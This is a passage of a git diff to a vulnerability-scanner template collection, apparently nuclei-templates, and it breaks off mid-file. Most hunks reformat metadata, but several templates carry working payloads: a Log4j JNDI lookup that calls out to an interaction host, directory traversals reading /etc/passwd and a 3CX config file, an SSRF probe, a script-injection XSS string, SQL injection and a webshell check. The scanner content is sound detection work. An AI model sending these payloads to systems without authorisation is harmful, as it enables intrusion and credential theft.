100644 index 0000000000..5b1e366207 --- /dev/null +++ b/vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml @@ -0,0 +1,47 @@ +id: mobileiron-log4j-jndi-rce + +info: + name: Ivanti MobileIron Log4J JNDI RCE + author: meme-lord + severity: high + description: Ivanti MobileIron Apache Log4j2 <=2.14.1 JNDI in features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker + who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. + reference: + - https://github.com/advisories/GHSA-jfh8-c2jp-5v3q + - https://www.lunasec.io/docs/blog/log4j-zero-day/ + - https://www.zdnet.com/article/mobileiron-customers-urged-to-patch-systems-due-to-potential-log4j-exploitation/ + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228 + classification: + cve-id: CVE-2021-44228 + remediation: Upgrade to version 2.14.2 or higher of MobileIron. If this is not possible, several Log4j exploit workarounds are available. + tags: jndi,log4j,rce,cve,cve2021 + +requests: + - raw: + - | + POST /mifs/j_spring_security_check HTTP/1.1 + Referer: {{RootURL}}/mifs/user/login.jsp + Content-Type: application/x-www-form-urlencoded + + j_username=${jndi:ldap://${hostName}.{{interactsh-url}}}&j_password=password&logincontext=employee + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms the DNS Interaction + words: + - "dns" + + - type: regex + part: interactsh_request + regex: + - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable + + extractors: + - type: regex + part: interactsh_request + group: 1 + regex: + - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output + +# Enhanced by cs on 2022/02/28 diff --git a/vulnerabilities/moodle/moodle-filter-jmol-xss.yaml b/vulnerabilities/moodle/moodle-filter-jmol-xss.yaml index e5153a78ec..4c3f3c6236 100644 --- a/vulnerabilities/moodle/moodle-filter-jmol-xss.yaml +++ b/vulnerabilities/moodle/moodle-filter-jmol-xss.yaml @@ -1,11 +1,12 @@ id: moodle-filter-jmol-xss info: - name: Moodle filter_jmol - XSS + name: Moodle filter_jmol - Cross-Site Scripting author: madrobot severity: medium description: Cross-site scripting on Moodle. - reference: https://www.dionach.com/blog/moodle-jmol-plugin-multiple-vulnerabilities/ + reference: + - https://www.dionach.com/blog/moodle-jmol-plugin-multiple-vulnerabilities/ tags: moodle,xss requests: @@ -27,4 +28,4 @@ requests: - type: word part: header words: - - "text/html" \ No newline at end of file + - "text/html" diff --git a/vulnerabilities/moodle/moodle-xss.yaml b/vulnerabilities/moodle/moodle-xss.yaml index bb07fda91a..5dcfe36be5 100644 --- a/vulnerabilities/moodle/moodle-xss.yaml +++ b/vulnerabilities/moodle/moodle-xss.yaml @@ -1,12 +1,13 @@ id: moodle-xss info: - name: Moodle redirect_uri Reflected XSS + name: Moodle redirect_uri - Cross-Site Scripting author: hackergautam - description: XSS in moodle via redirect_uri parameter severity: medium + description: XSS in moodle via redirect_uri parameter + reference: + - https://twitter.com/JacksonHHax/status/1391367064154042377 tags: moodle,xss - reference: https://twitter.com/JacksonHHax/status/1391367064154042377 requests: - method: GET diff --git a/vulnerabilities/netsweeper/netsweeper-open-redirect.yaml b/vulnerabilities/netsweeper/netsweeper-open-redirect.yaml index 75cc2ecdce..290e17322f 100644 --- a/vulnerabilities/netsweeper/netsweeper-open-redirect.yaml +++ b/vulnerabilities/netsweeper/netsweeper-open-redirect.yaml @@ -5,7 +5,8 @@ info: author: daffainfo severity: medium description: Netsweeper version 4.0.9 was vulnerable to an Unauthenticated and Authenticated Open Redirect vulnerability. - reference: https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz + reference: + - https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz tags: netsweeper,redirect requests: diff --git a/vulnerabilities/netsweeper/netsweeper-rxss.yaml b/vulnerabilities/netsweeper/netsweeper-rxss.yaml index 2eecc81e5b..18892a3101 100644 --- a/vulnerabilities/netsweeper/netsweeper-rxss.yaml +++ b/vulnerabilities/netsweeper/netsweeper-rxss.yaml @@ -1,10 +1,11 @@ id: netsweeper-rxss info: - name: Netsweeper 4.0.9 - Cross Site Scripting Injection + name: Netsweeper 4.0.9 - Cross-Site Scripting author: daffainfo severity: medium - reference: https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz + reference: + - https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz tags: netsweeper,xss requests: diff --git a/vulnerabilities/oracle/oracle-ebs-bispgraph-file-access.yaml b/vulnerabilities/oracle/oracle-ebs-bispgraph-file-access.yaml index 0f66889dec..42aa25e801 100644 --- a/vulnerabilities/oracle/oracle-ebs-bispgraph-file-access.yaml +++ b/vulnerabilities/oracle/oracle-ebs-bispgraph-file-access.yaml @@ -4,11 +4,11 @@ info: name: Oracle EBS Bispgraph File Access author: emenalf,tirtha_mandal,thomas_from_offensity severity: critical - tags: oracle,lfi reference: - https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4.pdf - https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite.pdf - http://www.davidlitchfield.com/AssessingOraclee-BusinessSuite11i.pdf + tags: oracle,lfi requests: - method: GET diff --git a/vulnerabilities/oracle/oracle-ebs-xss.yaml b/vulnerabilities/oracle/oracle-ebs-xss.yaml index b684437823..23bd3eea02 100644 --- a/vulnerabilities/oracle/oracle-ebs-xss.yaml +++ b/vulnerabilities/oracle/oracle-ebs-xss.yaml @@ -1,14 +1,14 @@ id: oracle-ebs-xss info: - name: Oracle EBS XSS + name: Oracle EBS - Cross-Site Scripting author: dhiyaneshDk severity: medium - tags: oracle,xss,ebs reference: - https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4.pdf - https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite.pdf - http://www.davidlitchfield.com/AssessingOraclee-BusinessSuite11i.pdf + tags: oracle,xss,ebs requests: - method: GET diff --git a/vulnerabilities/oracle/oracle-siebel-xss.yaml b/vulnerabilities/oracle/oracle-siebel-xss.yaml index 3d3374470c..161b89486b 100644 --- a/vulnerabilities/oracle/oracle-siebel-xss.yaml +++ b/vulnerabilities/oracle/oracle-siebel-xss.yaml @@ -1,12 +1,20 @@ id: oracle-siebel-xss info: - name: Oracle Siebel Loyalty 8.1 - XSS Vulnerability + name: Oracle Siebel Loyalty 8.1 - Cross-Site Scripting author: dhiyaneshDK - severity: medium - description: A vulnerability in Oracle Siebel Loyalty allows remote unauthenticated attackers to inject arbitary Javascript code into the responses returned by the '/loyalty_enu/start.swe/' endpoint. - reference: https://packetstormsecurity.com/files/86721/Oracle-Siebel-Loyalty-8.1-Cross-Site-Scripting.html - tags: xss,oracle + severity: high + description: A vulnerability in Oracle Siebel Loyalty allows remote unauthenticated attackers to inject arbitrary Javascript code into the responses returned by the '/loyalty_enu/start.swe/' endpoint. + reference: + - https://packetstormsecurity.com/files/86721/Oracle-Siebel-Loyalty-8.1-Cross-Site-Scripting.html + - https://exploit-db.com/exploits/47762 + - https://docs.oracle.com/cd/E95904_01/books/Secur/siebel-security-hardening.html + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N + cvss-score: 7.2 + cwe-id: CWE-79 + remediation: Upgrade to Siebel Loyalty version 8.2 or later. + tags: xss,oracle,siebel requests: - method: GET @@ -27,3 +35,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/03/30 diff --git a/vulnerabilities/oscommerce/oscommerce-rce.yaml b/vulnerabilities/oscommerce/oscommerce-rce.yaml index f359c42b11..8e7f717257 100644 --- a/vulnerabilities/oscommerce/oscommerce-rce.yaml +++ b/vulnerabilities/oscommerce/oscommerce-rce.yaml @@ -1,11 +1,13 @@ id: oscommerce-rce info: - author: Suman_Kar name: osCommerce 2.3.4.1 - Remote Code Execution - description: A vulnerability in osCommerce's install.php allows remote unauthenticated attackers to injecting PHP code into the db_database parameter, and subsequently use the configure.php page to to read the command's executed output - reference: https://www.exploit-db.com/exploits/50128 + author: Suman_Kar severity: high + description: A vulnerability in osCommerce's install.php allows remote unauthenticated attackers to injecting PHP code into the db_database parameter, and subsequently use the configure.php page to to read the + command's executed output + reference: + - https://www.exploit-db.com/exploits/50128 tags: rce,oscommerce requests: diff --git a/vulnerabilities/other/3cx-management-console.yaml b/vulnerabilities/other/3cx-management-console.yaml new file mode 100644 index 0000000000..389cf88761 --- /dev/null +++ b/vulnerabilities/other/3cx-management-console.yaml @@ -0,0 +1,35 @@ +id: 3cx-management-console + +info: + name: 3CX Management Console - Directory Traversal + author: random-robbie + severity: high + description: Directory traversal vulnerability on 3CX Management Console. + reference: + - https://medium.com/@frycos/pwning-3cx-phone-management-backends-from-the-internet-d0096339dd88 + metadata: + shoda-query: http.title:"3CX Phone System Management Console" + tags: 3cx,lfi,voip + +requests: + - method: GET + path: + - '{{BaseURL}}/Electron/download/windows/..\..\..\Http\webroot\config.json' + - '{{BaseURL}}/Electron/download/windows/\windows\win.ini' + + stop-at-first-match: true + matchers-condition: or + matchers: + - type: word + part: body + words: + - "CfgServerPassword" + - "CfgServerAppName" + condition: and + + - type: word + words: + - "bit app support" + - "fonts" + - "extensions" + condition: and diff --git a/vulnerabilities/other/74cms-sqli.yaml b/vulnerabilities/other/74cms-sqli.yaml deleted file mode 100644 index 904b2a3a57..0000000000 --- a/vulnerabilities/other/74cms-sqli.yaml +++ /dev/null @@ -1,17 +0,0 @@ -id: 74cms-sqli -info: - author: princechaddha - name: 74cms Sql Injection - severity: high - tags: 74cms,sqli - -requests: - - method: GET - path: - - '{{BaseURL}}/index.php?m=&c=AjaxPersonal&a=company_focus&company_id[0]=match&company_id[1][0]=test") and extractvalue(1,concat(0x7e,md5(1234567890))) -- a' - - matchers: - - type: word - words: - - "e807f1fcf82d132f9bb018ca6738a19f" - part: body diff --git a/vulnerabilities/other/WSO2-2019-0598.yaml b/vulnerabilities/other/WSO2-2019-0598.yaml new file mode 100644 index 0000000000..04fdb7b6f0 --- /dev/null +++ b/vulnerabilities/other/WSO2-2019-0598.yaml @@ -0,0 +1,28 @@ +id: WSO2-2019-0598 + +info: + name: WSO2 < 5.8.0 - Server Side Request Forgery + author: Amnotacat + severity: critical + description: | + This vulnerability can be exploited by misusing the UI gadgets loading capability of the shindig web application. An attacker can alter a specific URL in the request causing the server to initiate a GET request to the altered URL. + reference: + - https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2019-0598 + remediation: | + Upgrade the product version to 5.8.0 or higher which are not affected by this SSRF vulnerability. + tags: ssrf,wso2,shindig + +requests: + - method: GET + path: + - "{{BaseURL}}/shindig/gadgets/proxy?container=default&url=http://oast.pro" + + matchers-condition: and + matchers: + - type: word + words: + - "Interactsh Server" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/vulnerabilities/other/accent-microcomputers-lfi.yaml b/vulnerabilities/other/accent-microcomputers-lfi.yaml new file mode 100644 index 0000000000..76805df1c1 --- /dev/null +++ b/vulnerabilities/other/accent-microcomputers-lfi.yaml @@ -0,0 +1,33 @@ +id: accent-microcomputers-lfi + +info: + name: Accent Microcomputers LFI + author: 0x_Akoko + severity: high + description: A local file inclusion vulnerability in Accent Microcomputers offerings could allow remote attackers to retrieve password files. + reference: + - https://cxsecurity.com/issue/WLB-2018050036 + - http://www.accent.com.pl + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N + cvss-score: 8.6 + cwe-id: CWE-22 + tags: microcomputers,accent,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?id=50&file=../../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/02 diff --git a/vulnerabilities/other/antsword-backdoor.yaml b/vulnerabilities/other/antsword-backdoor.yaml new file mode 100644 index 0000000000..27ea2ed01c --- /dev/null +++ b/vulnerabilities/other/antsword-backdoor.yaml @@ -0,0 +1,36 @@ +id: antsword-backdoor + +info: + name: AntSword Backdoor Detection + author: ffffffff0x + severity: critical + description: An AntSword application backdoor shell was discovered. + reference: + - https://github.com/AntSwordProject/AntSword-Labs/tree/master/bypass_disable_functions/9 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.0 + cwe-id: CWE-553 + remediation: Reinstall AnstSword on a new system due to the target system's compromise. Follow best practices for securing PHP servers/applications via the php.ini and other mechanisms. + tags: backdoor,antsword + +requests: + - method: POST + path: + - "{{BaseURL}}/.antproxy.php" + headers: + Content-Type: application/x-www-form-urlencoded + body: 'ant=echo md5("antproxy.php");' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "951d11e51392117311602d0c25435d7f" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/04/22 diff --git a/vulnerabilities/other/asanhamayesh-lfi.yaml b/vulnerabilities/other/asanhamayesh-lfi.yaml new file mode 100644 index 0000000000..462ea627f3 --- /dev/null +++ b/vulnerabilities/other/asanhamayesh-lfi.yaml @@ -0,0 +1,25 @@ +id: asanhamayesh-lfi + +info: + name: Asanhamayesh CMS 3.4.6 Directory traversal Vulnerability + author: 0x_Akoko + severity: high + reference: + - https://cxsecurity.com/issue/WLB-2018030006 + - https://asanhamayesh.com + tags: asanhamayesh,lfi,traversal + +requests: + - method: GET + path: + - "{{BaseURL}}/downloadfile.php?file=../../../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 diff --git a/vulnerabilities/other/aspnuke-openredirect.yaml b/vulnerabilities/other/aspnuke-openredirect.yaml index ca498927f1..e6ce2c4e2f 100644 --- a/vulnerabilities/other/aspnuke-openredirect.yaml +++ b/vulnerabilities/other/aspnuke-openredirect.yaml @@ -9,9 +9,10 @@ info: requests: - method: GET path: - - "{{BaseURL}}/gotoURL.asp?url=google.com&id=43569" + - "{{BaseURL}}/gotoURL.asp?url=example.com&id=43569" + matchers: - type: regex - part: body + part: header regex: - - '(?m)^(?:Location\s*:\s*)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?google\.com(?:\s*)$' \ No newline at end of file + - '(?m)^(?:Location\s*:\s*)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*)$' \ No newline at end of file diff --git a/vulnerabilities/other/avada-xss.yaml b/vulnerabilities/other/avada-xss.yaml new file mode 100644 index 0000000000..6c0001f1f3 --- /dev/null +++ b/vulnerabilities/other/avada-xss.yaml @@ -0,0 +1,34 @@ +id: avada-xss + +info: + name: Avada < 7.4.2 - Reflected Cross-Site Scripting + author: Akincibor + severity: medium + description: The theme does not properly escape bbPress searches before outputting them back as breadcrumbs, leading to a Reflected Cross-Site Scripting issue. + reference: + - https://wpscan.com/vulnerability/eb172b07-56ab-41ce-92a1-be38bab567cb + - https://theme-fusion.com/documentation/avada/installation-maintenance/avada-changelog/ + tags: xss,wp,wordpress,wp-theme,avada + +requests: + - method: GET + path: + - '{{BaseURL}}/forums/search/z-->%22%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E/' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '">' + - 'avada-footer-scripts' + condition: and + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/vulnerabilities/other/bems-api-lfi.yaml b/vulnerabilities/other/bems-api-lfi.yaml index dfde5d648f..fa2efedbb9 100644 --- a/vulnerabilities/other/bems-api-lfi.yaml +++ b/vulnerabilities/other/bems-api-lfi.yaml @@ -1,11 +1,12 @@ id: bems-api-lfi info: - name: Longjing Technology BEMS API 1.21 - Remote Arbitrary File Download + name: Longjing Technology BEMS API 1.21 - Arbitrary File Retrieval author: gy741 severity: high - description: The application suffers from an unauthenticated arbitrary file download vulnerability. Input passed through the fileName parameter through downloads endpoint is not properly verified before being used to download files. This can be exploited to disclose the contents of arbitrary and sensitive files through directory traversal attacks. - reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5657.php + description: The application suffers from an unauthenticated arbitrary file retrieval vulnerability. Input passed through the fileName parameter through the downloads API endpoint is not properly verified before being used to download files. This can be exploited to disclose the contents of arbitrary and sensitive files through directory traversal attacks. + reference: + - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5657.php tags: lfi requests: @@ -17,7 +18,7 @@ requests: matchers: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: diff --git a/vulnerabilities/other/beward-ipcamera-disclosure.yaml b/vulnerabilities/other/beward-ipcamera-disclosure.yaml index 1dd105d3fd..7914b6da9f 100644 --- a/vulnerabilities/other/beward-ipcamera-disclosure.yaml +++ b/vulnerabilities/other/beward-ipcamera-disclosure.yaml @@ -1,13 +1,17 @@ id: beward-ipcamera-disclosure info: - name: BEWARD N100 H.264 VGA IP Camera M2.1.6 Arbitrary File Disclosure + name: BEWARD N100 H.264 VGA IP Camera M2.1.6 - Arbitrary File Disclosure author: geeknik severity: high description: The N100 compact color IP camera suffers from an authenticated file disclosure vulnerability. Input passed via the READ.filePath parameter in fileread script is not properly verified before being used to read files. This can be exploited to disclose the contents of arbitrary files via absolute path or via the SendCGICMD API. reference: - https://www.exploit-db.com/exploits/46320 - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5511.php + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N + cvss-score: 8.6 + cwe-id: CWE-22 tags: iot,camera,disclosure requests: @@ -26,3 +30,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/04/20 diff --git a/vulnerabilities/other/bitrix-open-redirect.yaml b/vulnerabilities/other/bitrix-open-redirect.yaml index b56424baca..676932a520 100644 --- a/vulnerabilities/other/bitrix-open-redirect.yaml +++ b/vulnerabilities/other/bitrix-open-redirect.yaml @@ -5,7 +5,8 @@ info: author: pikpikcu severity: low description: The Bitrix Russia Site Management 2.0 accepts a user-controlled input that specifies a link to an external site, and uses that link in a Redirect. - reference: https://packetstormsecurity.com/files/151955/1C-Bitrix-Site-Management-Russia-2.0-Open-Redirection.html + reference: + - https://packetstormsecurity.com/files/151955/1C-Bitrix-Site-Management-Russia-2.0-Open-Redirection.html tags: redirect,bitrix requests: diff --git a/vulnerabilities/other/blue-ocean-excellence-lfi.yaml b/vulnerabilities/other/blue-ocean-excellence-lfi.yaml index dffb6b050f..d2f7caa672 100644 --- a/vulnerabilities/other/blue-ocean-excellence-lfi.yaml +++ b/vulnerabilities/other/blue-ocean-excellence-lfi.yaml @@ -4,7 +4,8 @@ info: name: Blue Ocean Excellence LFI author: pikpikcu severity: high - reference: https://blog.csdn.net/qq_41901122/article/details/116786883 + reference: + - https://blog.csdn.net/qq_41901122/article/details/116786883 tags: blue-ocean,lfi requests: diff --git a/vulnerabilities/other/bullwark-momentum-lfi.yaml b/vulnerabilities/other/bullwark-momentum-lfi.yaml index e8dd1b7e11..55d671db0b 100644 --- a/vulnerabilities/other/bullwark-momentum-lfi.yaml +++ b/vulnerabilities/other/bullwark-momentum-lfi.yaml @@ -30,4 +30,4 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" diff --git a/vulnerabilities/other/cacti-weathermap-file-write.yaml b/vulnerabilities/other/cacti-weathermap-file-write.yaml index 04a5d1b654..ef451efdd0 100644 --- a/vulnerabilities/other/cacti-weathermap-file-write.yaml +++ b/vulnerabilities/other/cacti-weathermap-file-write.yaml @@ -4,7 +4,8 @@ info: name: Cacti Weathermap File Write author: pikpikcu severity: medium - reference: https://www.freebuf.com/articles/system/125177.html + reference: + - https://www.freebuf.com/articles/system/125177.html tags: injection,cacti requests: diff --git a/vulnerabilities/other/caucho-resin-info-disclosure.yaml b/vulnerabilities/other/caucho-resin-info-disclosure.yaml index 04795427db..11dea3cf9b 100644 --- a/vulnerabilities/other/caucho-resin-info-disclosure.yaml +++ b/vulnerabilities/other/caucho-resin-info-disclosure.yaml @@ -4,8 +4,9 @@ info: name: Caucho Resin Information Disclosure author: pikpikcu severity: info - reference: https://www.exploit-db.com/exploits/27888 - tags: exposure,resin + reference: + - https://www.exploit-db.com/exploits/27888 + tags: exposure,resin,caucho requests: - method: GET diff --git a/vulnerabilities/other/chamilo-lms-sqli.yaml b/vulnerabilities/other/chamilo-lms-sqli.yaml index 8a3b456b4d..0f8716056a 100644 --- a/vulnerabilities/other/chamilo-lms-sqli.yaml +++ b/vulnerabilities/other/chamilo-lms-sqli.yaml @@ -1,7 +1,8 @@ id: chamilo-lms-sqli + info: - author: undefl0w name: Chamilo LMS SQL Injection + author: undefl0w severity: high description: Finds sql injection in Chamilo version 1.11.14 tags: chamilo,sqli diff --git a/vulnerabilities/other/chamilo-lms-xss.yaml b/vulnerabilities/other/chamilo-lms-xss.yaml index 3af835083c..c7804b9001 100644 --- a/vulnerabilities/other/chamilo-lms-xss.yaml +++ b/vulnerabilities/other/chamilo-lms-xss.yaml @@ -1,10 +1,17 @@ id: chamilo-lms-xss info: - name: Chamilo LMS Cross Site Scripting + name: Chamilo LMS 1.11.14 Cross-Site Scripting author: geeknik - severity: medium - description: https://www.netsparker.com/web-applications-advisories/ns-21-001-cross-site-scripting-in-chamilo-lms/ + severity: high + description: Chamilo LMS 1.11.14 is vulnerable to cross-site scripting. + reference: + - https://www.netsparker.com/web-applications-advisories/ns-21-001-cross-site-scripting-in-chamilo-lms/ + - https://support.chamilo.org/projects/chamilo-18/wiki/Security_issues#Issue-45-2021-01-21-Moderate-impact-moderate-risk-XSS-vulnerability-in-agenda + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N + cvss-score: 7.2 + cwe-id: CWE-79 tags: xss,chamilo requests: @@ -25,3 +32,5 @@ requests: part: header words: - "text/html" + +# Enhanced by mp on 2022/04/08 diff --git a/vulnerabilities/other/ckan-dom-based-xss.yaml b/vulnerabilities/other/ckan-dom-based-xss.yaml index cbfb774e69..7cc02f4bf3 100644 --- a/vulnerabilities/other/ckan-dom-based-xss.yaml +++ b/vulnerabilities/other/ckan-dom-based-xss.yaml @@ -5,8 +5,9 @@ info: author: dhiyaneshDk severity: medium description: CKAN uses the old jQuery Sparkle library which is vulnerable to DOM Based XSS. + reference: + - https://github.com/ckan/ckan/blob/b9e45e2723d4abd70fa72b16ec4a0bebc795c56b/ckan/public/base/javascript/view-filters.js#L27 tags: dom,xss - reference: https://github.com/ckan/ckan/blob/b9e45e2723d4abd70fa72b16ec4a0bebc795c56b/ckan/public/base/javascript/view-filters.js#L27 requests: - method: GET diff --git a/vulnerabilities/other/clockwatch-enterprise-rce.yaml b/vulnerabilities/other/clockwatch-enterprise-rce.yaml index f3fd22042e..20c5c15802 100644 --- a/vulnerabilities/other/clockwatch-enterprise-rce.yaml +++ b/vulnerabilities/other/clockwatch-enterprise-rce.yaml @@ -4,8 +4,9 @@ info: name: ClockWatch Enterprise RCE author: gy741 severity: critical + reference: + - https://blog.grimm-co.com/2021/07/old-dog-same-tricks.html tags: clockwatch,rce,network - reference: https://blog.grimm-co.com/2021/07/old-dog-same-tricks.html network: - inputs: @@ -13,13 +14,16 @@ network: host: - "{{Hostname}}" - - "{{Hostname}}:1001" + - "{{Host}}:1001" + matchers-condition: and matchers: + - type: word part: interactsh_protocol words: - "dns" + - type: word words: - "OK-C" diff --git a/vulnerabilities/other/coldfusion-debug-xss.yaml b/vulnerabilities/other/coldfusion-debug-xss.yaml index 2207ee9960..4de60288e2 100644 --- a/vulnerabilities/other/coldfusion-debug-xss.yaml +++ b/vulnerabilities/other/coldfusion-debug-xss.yaml @@ -5,7 +5,10 @@ info: author: dhiyaneshDK severity: medium description: The remote Adobe ColdFusion debug page has been left open to unauthenticated users, this could allow remote attackers to trigger a reflected cross site scripting against the visitors of the site. - reference: https://github.com/jaeles-project/jaeles-signatures/blob/master/common/coldfusion-debug-xss.yaml + reference: + - https://github.com/jaeles-project/jaeles-signatures/blob/master/common/coldfusion-debug-xss.yaml + metadata: + shodan-query: http.component:"Adobe ColdFusion" tags: adobe,coldfusion,xss requests: diff --git a/vulnerabilities/other/commax-credentials-disclosure.yaml b/vulnerabilities/other/commax-credentials-disclosure.yaml index bbce1d74c0..3c33beb354 100644 --- a/vulnerabilities/other/commax-credentials-disclosure.yaml +++ b/vulnerabilities/other/commax-credentials-disclosure.yaml @@ -5,7 +5,8 @@ info: author: gy741 severity: critical description: The COMMAX CCTV Bridge for the DVR service allows an unauthenticated attacker to disclose RTSP credentials in plain-text - reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5665.php + reference: + - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5665.php tags: commax,exposure,camera,iot requests: diff --git a/vulnerabilities/other/comtrend-password-exposure.yaml b/vulnerabilities/other/comtrend-password-exposure.yaml index 1764bf1d74..da04291a2e 100644 --- a/vulnerabilities/other/comtrend-password-exposure.yaml +++ b/vulnerabilities/other/comtrend-password-exposure.yaml @@ -5,8 +5,9 @@ info: author: geeknik severity: high description: A vulnerability in COMTREND ADSL Router allows remote authenticated users to execute arbitrary commands via the telnet interface, the password for this interface is leaked to unauthenticated users via the 'password.cgi' endpoint. - reference: https://www.exploit-db.com/exploits/16275 - tags: router,exposure,iot + reference: + - https://www.exploit-db.com/exploits/16275 + tags: router,exposure,iot,rce requests: - method: GET diff --git a/vulnerabilities/other/concrete-xss.yaml b/vulnerabilities/other/concrete-xss.yaml index 57ec254a12..b7833ae72e 100644 --- a/vulnerabilities/other/concrete-xss.yaml +++ b/vulnerabilities/other/concrete-xss.yaml @@ -1,15 +1,15 @@ id: concrete-xss info: - author: shifacyclewla,hackergautam - description: The Concrete CMS < 8.5.2 is vulnerable to Reflected XSS using cID parameter. name: Unauthenticated reflected XSS in preview_as_user function + author: shifacyclewla,hackergautam severity: medium - tags: concrete,xss,cms + description: The Concrete CMS < 8.5.2 is vulnerable to Reflected XSS using cID parameter. reference: - https://hackerone.com/reports/643442 - https://github.com/concrete5/concrete5/pull/7999 - https://twitter.com/JacksonHHax/status/1389222207805661187 + tags: concrete,xss,cms requests: - method: GET diff --git a/vulnerabilities/other/core-chuangtian-cloud-rce.yaml b/vulnerabilities/other/core-chuangtian-cloud-rce.yaml index 94cac428de..cab900eaf7 100644 --- a/vulnerabilities/other/core-chuangtian-cloud-rce.yaml +++ b/vulnerabilities/other/core-chuangtian-cloud-rce.yaml @@ -4,7 +4,8 @@ info: name: Core Chuangtian Cloud Desktop System RCE author: pikpikcu severity: critical - reference: https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g + reference: + - https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g tags: rce requests: diff --git a/vulnerabilities/other/cs-cart-unauthenticated-lfi.yaml b/vulnerabilities/other/cs-cart-unauthenticated-lfi.yaml index a098023ed9..1f0775c517 100644 --- a/vulnerabilities/other/cs-cart-unauthenticated-lfi.yaml +++ b/vulnerabilities/other/cs-cart-unauthenticated-lfi.yaml @@ -5,7 +5,8 @@ info: author: 0x_Akoko severity: high description: A vulnerability in CS-Cart allows remote unauthenticated attackers to access locally stored files and reveal their content. - reference: https://cxsecurity.com/issue/WLB-2020100100 + reference: + - https://cxsecurity.com/issue/WLB-2020100100 tags: cscart,lfi requests: diff --git a/vulnerabilities/other/dedecms-carbuyaction-fileinclude.yaml b/vulnerabilities/other/dedecms-carbuyaction-fileinclude.yaml index 16884d7384..72d4198957 100644 --- a/vulnerabilities/other/dedecms-carbuyaction-fileinclude.yaml +++ b/vulnerabilities/other/dedecms-carbuyaction-fileinclude.yaml @@ -5,7 +5,11 @@ info: author: pikpikcu severity: high description: A vulnerability in DedeCMS's 'carbuyaction.php' endpoint allows remote attackers to return the content of locally stored files via a vulnerability in the 'code' parameter. - reference: https://www.cnblogs.com/milantgh/p/3615986.html + reference: + - https://www.cnblogs.com/milantgh/p/3615986.html + metadata: + verified: true + shodan-query: http.html:"power by dedecms" || title:"dedecms" tags: dedecms requests: diff --git a/vulnerabilities/other/dedecms-membergroup-sqli.yaml b/vulnerabilities/other/dedecms-membergroup-sqli.yaml index 1adc04596d..6ab43810d6 100644 --- a/vulnerabilities/other/dedecms-membergroup-sqli.yaml +++ b/vulnerabilities/other/dedecms-membergroup-sqli.yaml @@ -5,7 +5,8 @@ info: author: pikpikcu severity: medium description: A vulnerability in the DedeCMS product allows remote unauthenticated users to inject arbitrary SQL statements via the 'ajax_membergroup.php' endpoint and the 'membergroup' parameter. - reference: http://www.dedeyuan.com/xueyuan/wenti/1244.html + reference: + - http://www.dedeyuan.com/xueyuan/wenti/1244.html tags: sqli,dedecms requests: diff --git a/vulnerabilities/other/dedecms-openredirect.yaml b/vulnerabilities/other/dedecms-openredirect.yaml index d00f523db7..689d98efa2 100644 --- a/vulnerabilities/other/dedecms-openredirect.yaml +++ b/vulnerabilities/other/dedecms-openredirect.yaml @@ -4,7 +4,11 @@ info: name: DedeCMS Open Redirect author: pikpikcu severity: low - reference: https://blog.csdn.net/ystyaoshengting/article/details/82734888 + reference: + - https://blog.csdn.net/ystyaoshengting/article/details/82734888 + metadata: + verified: true + shodan-query: http.html:"power by dedecms" || title:"dedecms" tags: dedecms,redirect requests: diff --git a/vulnerabilities/other/dicoogle-pacs-lfi.yaml b/vulnerabilities/other/dicoogle-pacs-lfi.yaml new file mode 100644 index 